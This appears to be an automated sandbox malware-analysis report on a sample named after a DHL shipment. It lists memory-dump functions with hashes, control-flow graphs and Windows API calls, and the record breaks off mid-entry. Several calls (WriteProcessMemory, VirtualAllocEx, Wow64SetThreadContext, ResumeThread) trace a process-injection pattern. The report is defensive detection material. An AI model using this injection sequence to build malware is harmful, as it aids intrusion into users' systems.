                                                • Source File: 00000000.00000002.1466853559.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12b0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 4bfde62a29d083df0bd5df5206db7b09608105aeac12bb3e3f54e9251c02f667
                                                • Instruction ID: db49e5aa7019bfab19239345f7dcbc01720e645b213edce6f02c96c07685ebfd
                                                • Opcode Fuzzy Hash: 4bfde62a29d083df0bd5df5206db7b09608105aeac12bb3e3f54e9251c02f667
                                                • Instruction Fuzzy Hash: 037157B0A20B058FE724DF29D48179ABBF1BF88344F00892DE59AD7A40DB75E945CB94
                                                Function 012B44B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 873 12b44b0-12b59d9 CreateActCtxA 876 12b59db-12b59e1 873->876 877 12b59e2-12b5a3c 873->877 876->877 884 12b5a4b-12b5a4f 877->884 885 12b5a3e-12b5a41 877->885 886 12b5a51-12b5a5d 884->886 887 12b5a60 884->887 885->884 886->887 889 12b5a61 887->889 889->889
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 012B59C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1466853559.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12b0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 8eb16ee4fffe10833c032c2a9edf8ee6f3105b8dd77f9d9bd685cb7eaa543f08
                                                • Instruction ID: f12369e9ae26bb5a574de0ce99360de8feb3ca55d8067337d757453c1b0e0b61
                                                • Opcode Fuzzy Hash: 8eb16ee4fffe10833c032c2a9edf8ee6f3105b8dd77f9d9bd685cb7eaa543f08
                                                • Instruction Fuzzy Hash: 7141D1B0C10719CFEB24CFA9D884BDDBBB5BF49304F20805AD509AB251DBB56986CF90
                                                Function 012B590D Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 890 12b590d-12b59d9 CreateActCtxA 892 12b59db-12b59e1 890->892 893 12b59e2-12b5a3c 890->893 892->893 900 12b5a4b-12b5a4f 893->900 901 12b5a3e-12b5a41 893->901 902 12b5a51-12b5a5d 900->902 903 12b5a60 900->903 901->900 902->903 905 12b5a61 903->905 905->905
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 012B59C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1466853559.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12b0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: fb27df02f350d0c457423bce075e8006a1c44278403f00d686fdd1ac877fa4fc
                                                • Instruction ID: f60e7867e3c3e9fb5d1cbb541144a79de60540f03bfa7a56b14cfc620cc85b1a
                                                • Opcode Fuzzy Hash: fb27df02f350d0c457423bce075e8006a1c44278403f00d686fdd1ac877fa4fc
                                                • Instruction Fuzzy Hash: 0A41C270C00719CFEB24CFA9D8847DDBBB5BF49304F24815AD409AB251DBB66986CF90
                                                Function 076EA9C8 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 906 76ea9c8-76ea9ed call 76e9c10 909 76ea9ef-76ea9ff 906->909 910 76eaa02-76eaa94 CreateIconFromResourceEx 906->910 914 76eaa9d-76eaaba 910->914 915 76eaa96-76eaa9c 910->915 915->914
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1477163310.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_76e0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: CreateFromIconResource
                                                • String ID:
                                                • API String ID: 3668623891-0
                                                • Opcode ID: 709afc5d8adeb1d975ce10a2e47ec5140b0b39181daeecd00846c78a1ad7a3ab
                                                • Instruction ID: 950766ed4c9fd697495e446deb6f758aeaae1c6301a688ef0c2b7a3fea1f178b
                                                • Opcode Fuzzy Hash: 709afc5d8adeb1d975ce10a2e47ec5140b0b39181daeecd00846c78a1ad7a3ab
                                                • Instruction Fuzzy Hash: C43198B29003499FCB11CFA9C941AEEBFF8EF09310F14845AE515A7220C3399895CFA0
                                                Function 06D944F3 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 918 6d944f3-6d94546 921 6d94548-6d94554 918->921 922 6d94556-6d94595 WriteProcessMemory 918->922 921->922 924 6d9459e-6d945ce 922->924 925 6d94597-6d9459d 922->925 925->924
                                                APIs
                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06D94588
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: daa34d0d48209e9180ce3192516d476b9767c3cf1ce022e564c3183c0645e873
                                                • Instruction ID: 61f416a4f568327886665e40abf6f5feaadfc5a990d3076f12b1df35db152c1b
                                                • Opcode Fuzzy Hash: daa34d0d48209e9180ce3192516d476b9767c3cf1ce022e564c3183c0645e873
                                                • Instruction Fuzzy Hash: A42124759003499FDB50CFAAC880BEEBBF5FF48310F10842AE919A7241C7789945CBA0
                                                Function 06D944F8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06D94588
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 260a6d0e4e21808e74261c6caaa9d0f32c2ea1719b85b65827e339378133b23f
                                                • Instruction ID: 013396a63d7602a41ff5fd3a6c107aeb109e5146251584b11621482949af27b6
                                                • Opcode Fuzzy Hash: 260a6d0e4e21808e74261c6caaa9d0f32c2ea1719b85b65827e339378133b23f
                                                • Instruction Fuzzy Hash: 31211375D003599FDB50CFAAC881BEEBBF5FF48310F10842AE919A7241D7789945CBA4
                                                Function 012BB830 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012BD6E6,?,?,?,?,?), ref: 012BD7A7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1466853559.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12b0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: aa8475bb5c93849dd946a7efae11fd49a3b16a31c6887ea7098bb2861c745bb2
                                                • Instruction ID: 2c721df18b2e7f04976f31d3ff468ae6a0a451120077b7a0febc4c33785c9051
                                                • Opcode Fuzzy Hash: aa8475bb5c93849dd946a7efae11fd49a3b16a31c6887ea7098bb2861c745bb2
                                                • Instruction Fuzzy Hash: D721E5B59102489FDB10CF9AD584ADEBFF4EB48310F14841AE919A3310D378A954CFA5
                                                Function 06D945E0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06D94668
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 7a77d5283c782b0147e3f87264b1913589d11b42a80d0f4e81e8bace2840a633
                                                • Instruction ID: b333fb1296d67465be159feee3b915a66b63efdc070e7b72bec0380f07bf2356
                                                • Opcode Fuzzy Hash: 7a77d5283c782b0147e3f87264b1913589d11b42a80d0f4e81e8bace2840a633
                                                • Instruction Fuzzy Hash: FC212771D003499FDB10CFAAC880BDEBBF5FF48320F108429E519A7240C7799945CBA4
                                                Function 06D93B18 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D93B9E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 545047f3bc4caed9550c5907de9af69339322dcfe78eb963625c336f7f361c53
                                                • Instruction ID: 7c735fc0b8946b51d460cbccb51387976aa98a7a38a821878cdf2b8656873263
                                                • Opcode Fuzzy Hash: 545047f3bc4caed9550c5907de9af69339322dcfe78eb963625c336f7f361c53
                                                • Instruction Fuzzy Hash: F6212575D007088FDB20CFAAC4857EEBBF5EF88324F258429D459A7640CB789985CFA4
                                                Function 06D96B90 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • EnumThreadWindows.USER32(?,00000000,?), ref: 06D96C09
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: EnumThreadWindows
                                                • String ID:
                                                • API String ID: 2941952884-0
                                                • Opcode ID: 655ab908073e9695771e067d85784bdb99a87d074553f4927661666d9fece49e
                                                • Instruction ID: 4265f2d96ed9e5078a3db6e1d8deab7e3339f6ebc6868c093a1c5b6106df49d3
                                                • Opcode Fuzzy Hash: 655ab908073e9695771e067d85784bdb99a87d074553f4927661666d9fece49e
                                                • Instruction Fuzzy Hash: 42211875D002498FDB10CFAAC984BEEFBF5FB88310F14842AE455A3251D778A945CFA5
                                                Function 06D945E8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06D94668
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 7d95dc4a5e4e8e0bfc53e3de8071fb5484bd86243e18f08a6d6593c6a9f7922c
                                                • Instruction ID: 4eb062c9423c1e036fb17d60ef12efea8b2f38ff780069b6204da3b2e05f1b95
                                                • Opcode Fuzzy Hash: 7d95dc4a5e4e8e0bfc53e3de8071fb5484bd86243e18f08a6d6593c6a9f7922c
                                                • Instruction Fuzzy Hash: 352128B1D003599FDB10CFAAC880BDEBBF5FF48320F108529E519A7240D7789945CBA4
                                                Function 06D93B20 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D93B9E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: ea50d739a1ffb099988a0c42469cd368426be6920d665883d05704cea0ce49fb
                                                • Instruction ID: d467935b05956f01b8aa963fa0c212c751ce272377d145ab5428b90090fcad01
                                                • Opcode Fuzzy Hash: ea50d739a1ffb099988a0c42469cd368426be6920d665883d05704cea0ce49fb
                                                • Instruction Fuzzy Hash: B6211871D007098FDB10DFAAC4857EEBBF4EF88224F148429D419A7240DB789945CFA4
                                                Function 06D97081 Relevance: 1.6, APIs: 1, Instructions: 62windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MessageBoxW.USER32(?,00000000,00000000,?), ref: 06D97105
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: Message
                                                • String ID:
                                                • API String ID: 2030045667-0
                                                • Opcode ID: 0bc38decff643d09710e3e48148c0e5675775ebcfc10a18ca574e45589a4aca8
                                                • Instruction ID: 9ca07f71bd1c427fddf0ebd129b6f009cb14252b32b235c41973526137fb45ac
                                                • Opcode Fuzzy Hash: 0bc38decff643d09710e3e48148c0e5675775ebcfc10a18ca574e45589a4aca8
                                                • Instruction Fuzzy Hash: 392104B6D003099FCB10CF9AD884ADEFBB5FB88314F10851EE419A7200C375A545CBA0
                                                Function 012BD719 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012BD6E6,?,?,?,?,?), ref: 012BD7A7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1466853559.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12b0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 28aec6379f69db66b1cf96a3cd30d175766747ad1383806adfe7c4f5892d6570
                                                • Instruction ID: 2d9abca60658712ac667d3854b35a17fac2ca9e22a1df93d544022bdfdf8327d
                                                • Opcode Fuzzy Hash: 28aec6379f69db66b1cf96a3cd30d175766747ad1383806adfe7c4f5892d6570
                                                • Instruction Fuzzy Hash: 8D21E2B5D003499FDB10CFAAD984ADEBBF5FB48314F14841AE918A3211D378A954CF64
                                                Function 06D96B98 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • EnumThreadWindows.USER32(?,00000000,?), ref: 06D96C09
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: EnumThreadWindows
                                                • String ID:
                                                • API String ID: 2941952884-0
                                                • Opcode ID: 9f2bd299fa434d0be1bd388de7f311697fdb45dfab18391c6e4d3c7ba6d22d58
                                                • Instruction ID: 7c45d5ad9ae944e0ac60da4c9fbd0f3887cc52b0ceef9f35297652ae61d4cd63
                                                • Opcode Fuzzy Hash: 9f2bd299fa434d0be1bd388de7f311697fdb45dfab18391c6e4d3c7ba6d22d58
                                                • Instruction Fuzzy Hash: 8021F775D002498FDB14CF9AC944BEEFBF5FB88320F14842AE415A3251D778A945CF65
                                                Function 07117CB8 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 07117D33
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 9e4c9b1ead46d7353b8ab50d2d9d6dcd891604255c428eee25009e5cfdbfc5ed
                                                • Instruction ID: 8fe6235df0095ac6c1a180252d7577b00e814b33115e0ba12da59422ae917c0a
                                                • Opcode Fuzzy Hash: 9e4c9b1ead46d7353b8ab50d2d9d6dcd891604255c428eee25009e5cfdbfc5ed
                                                • Instruction Fuzzy Hash: 952136B5D002099FCB20CF9AD484BDEFBF4FB48320F10842AE858A7650D378A585CFA5
                                                Function 06D94430 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06D944A6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: da8d5df96463c514594b25cd532f9ada8e70a47f70665a2693bb8ccf555d23a0
                                                • Instruction ID: af539b7c357dc04c2a59c089159a04c74bab86be5035b67284d554f6a2d6e4e3
                                                • Opcode Fuzzy Hash: da8d5df96463c514594b25cd532f9ada8e70a47f70665a2693bb8ccf555d23a0
                                                • Instruction Fuzzy Hash: CC2147719003489FDB20DFAAC844BDEBBF5EF88320F24881DE955A7250CB799945CFA0
                                                Function 06D97088 Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MessageBoxW.USER32(?,00000000,00000000,?), ref: 06D97105
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: Message
                                                • String ID:
                                                • API String ID: 2030045667-0
                                                • Opcode ID: c3a03c1365f85408f432fea3432c49d25dd79e6b9f1f809837face9b9f9d448d
                                                • Instruction ID: ea0d3743610a489791010b377e2140cd2ec45cd123022907a0f8bb0c931a4be7
                                                • Opcode Fuzzy Hash: c3a03c1365f85408f432fea3432c49d25dd79e6b9f1f809837face9b9f9d448d
                                                • Instruction Fuzzy Hash: 0E21E3B5D003499FCB10CF9AD884ADEFBB5FB88314F10852EE819A7200C375A944CBA4
                                                Function 076E9C10 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,076EA9E2,?,?,?,?,?), ref: 076EAA87
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1477163310.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_76e0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: CreateFromIconResource
                                                • String ID:
                                                • API String ID: 3668623891-0
                                                • Opcode ID: 93867f043ab64da751b076f78399717f0ba55dd565e7fafc5e7846846576267a
                                                • Instruction ID: 1207faab2081cf2a06a22a3c8533fdb5027f0c22f77e51f37cda8e94b8d41f85
                                                • Opcode Fuzzy Hash: 93867f043ab64da751b076f78399717f0ba55dd565e7fafc5e7846846576267a
                                                • Instruction Fuzzy Hash: 65112CB59003499FDB10CF9AD544BEEBFF8EB48310F14841AE515A7210C375A994CFA4
                                                Function 07117CC0 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 07117D33
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 3871937adf8a87e7881b245e6305f0f3592c2736249f3ac53fea4ba77655762f
                                                • Instruction ID: ceab7cc52ce6dd03048cac1b3a0ab308dcccc7428f4bab5c34dcc390151b7133
                                                • Opcode Fuzzy Hash: 3871937adf8a87e7881b245e6305f0f3592c2736249f3ac53fea4ba77655762f
                                                • Instruction Fuzzy Hash: 5521E4B5D002499FDB20CF9AD484BDEFBF4FB48320F108429E959A7251D378A945CFA5
                                                Function 06D94438 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06D944A6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 5bf29461aafd7d654f58dbaf6e52c32db7870cbad0c3c25ff4c6e7702e2cc301
                                                • Instruction ID: bffd7259eeece66fd986ed5ef9e5cdee93d5e654095a61341bded0b4b27e779d
                                                • Opcode Fuzzy Hash: 5bf29461aafd7d654f58dbaf6e52c32db7870cbad0c3c25ff4c6e7702e2cc301
                                                • Instruction Fuzzy Hash: EF112975D003489FDB20DFAAC844BDEBBF5EF88320F148419D515A7250CB799945CFA0
                                                Function 06D93630 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 4a67b2ea16abf103f802cee9bb8f221bbe557a4f54c2b83b15d8fe66a4eec865
                                                • Instruction ID: 5429357b4268542312591d8359eaaf711e2ea569bb177c1fa27ed35d64ef8582
                                                • Opcode Fuzzy Hash: 4a67b2ea16abf103f802cee9bb8f221bbe557a4f54c2b83b15d8fe66a4eec865
                                                • Instruction Fuzzy Hash: AA114675D043488FDB20DFAAD4447EEBBF5EF88320F248819C459A7240CB39A946CFA4
                                                Function 06D96660 Relevance: 1.5, APIs: 1, Instructions: 49comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 06D966BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: Initialize
                                                • String ID:
                                                • API String ID: 2538663250-0
                                                • Opcode ID: 4daf7f96fddb2929709919ae34202673210797f88ffeda0f39a776a2bca93806
                                                • Instruction ID: 64e11730029e180f06f7fe265c8bb94670a9b7ec0a537ab8fbb35186740c97ab
                                                • Opcode Fuzzy Hash: 4daf7f96fddb2929709919ae34202673210797f88ffeda0f39a776a2bca93806
                                                • Instruction Fuzzy Hash: 591136B5C003488FDB20DF9AD845BCEBFF8EB88210F208459D418A3200D379A544CFA5
                                                Function 06D93638 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: b81d0566d339eddf0805ddae05ea264e207f7f2c9ebbc39a288f27ac9f7a4725
                                                • Instruction ID: f4b2941781031192a8353c6d0da86f050648eb703d7d1ae7eaaef34b873adc5c
                                                • Opcode Fuzzy Hash: b81d0566d339eddf0805ddae05ea264e207f7f2c9ebbc39a288f27ac9f7a4725
                                                • Instruction Fuzzy Hash: D31125B5D003488FDB20DFAAC4457DEFBF5EB88220F248819D419A7240CB79A945CFA4
                                                Function 012BB038 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 012BB09E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1466853559.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12b0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: b33fc06784868f8eddd653253af141fefb7b69083e6fe66055f1d02463a3825d
                                                • Instruction ID: 30c6992b1ae3cc9fd2f974718fc4a5593c73cebf1005b472d0a8e8d38440704a
                                                • Opcode Fuzzy Hash: b33fc06784868f8eddd653253af141fefb7b69083e6fe66055f1d02463a3825d
                                                • Instruction Fuzzy Hash: A311E0B5D002498FDB20CF9AD484BDEFBF4EB88314F10881AD929A7610D379A545CFA5
                                                Function 06D97458 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 06D974BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 001e71bdc789080cddf32dc1cdac91f4e72bb6d54a223d3320904830a978246e
                                                • Instruction ID: 82124e0bd5c32997b24e1c9a6ac9566add6e3b2b4a8b5bd30264b1b04f6b1a10
                                                • Opcode Fuzzy Hash: 001e71bdc789080cddf32dc1cdac91f4e72bb6d54a223d3320904830a978246e
                                                • Instruction Fuzzy Hash: 4711F8B58003489FDB10CF9AD445BDEFBF8EB48310F108419D559A3240C375A944CFA1
                                                Function 06D95EF8 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 06D966BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: Initialize
                                                • String ID:
                                                • API String ID: 2538663250-0
                                                • Opcode ID: 503d88ad2e25702c77fade9257d870c8d7e64a244c9dadaed90559d2335afd3b
                                                • Instruction ID: c561e8f8c5123a864bbae8b040ce82ec421064e93f3b2b234a7800d10a2c2021
                                                • Opcode Fuzzy Hash: 503d88ad2e25702c77fade9257d870c8d7e64a244c9dadaed90559d2335afd3b
                                                • Instruction Fuzzy Hash: E01103B5D043488FDB20DF9AD444BDEBBF4EB48310F208459D519A7310D378A944CFA5
                                                Function 06D97460 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 06D974BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 8fd79c0610a0ade64ca2ac4393736aa79d7fefb16630484b7483cda8a6c72484
